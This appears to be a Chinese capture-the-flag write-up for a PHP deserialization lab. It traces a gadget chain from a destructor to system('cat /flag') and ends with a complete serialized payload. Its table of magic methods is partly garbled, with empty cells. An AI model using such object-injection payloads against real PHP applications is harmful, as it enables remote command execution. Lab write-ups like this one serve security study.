PHP 反序列化靶场
源码分析:
入口是 unserialize($_POST['url']),定义了三个类,构成一条调用链。
调用链分析:
类 | 魔法方法 | 触发条件 | 行为 |
|---|---|---|---|
|
| 对象销毁 | 调用 |
|
| 对象被作为函数调用 | 访问 |
|
| 访问不可访问属性 | 执行 |
完整链: syc::__destruct() → lover::__invoke() → web::__get() → system("cat /flag")
Payload:
Plaintext
O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:9:"cat /flag";}s:2:"QW";N;}}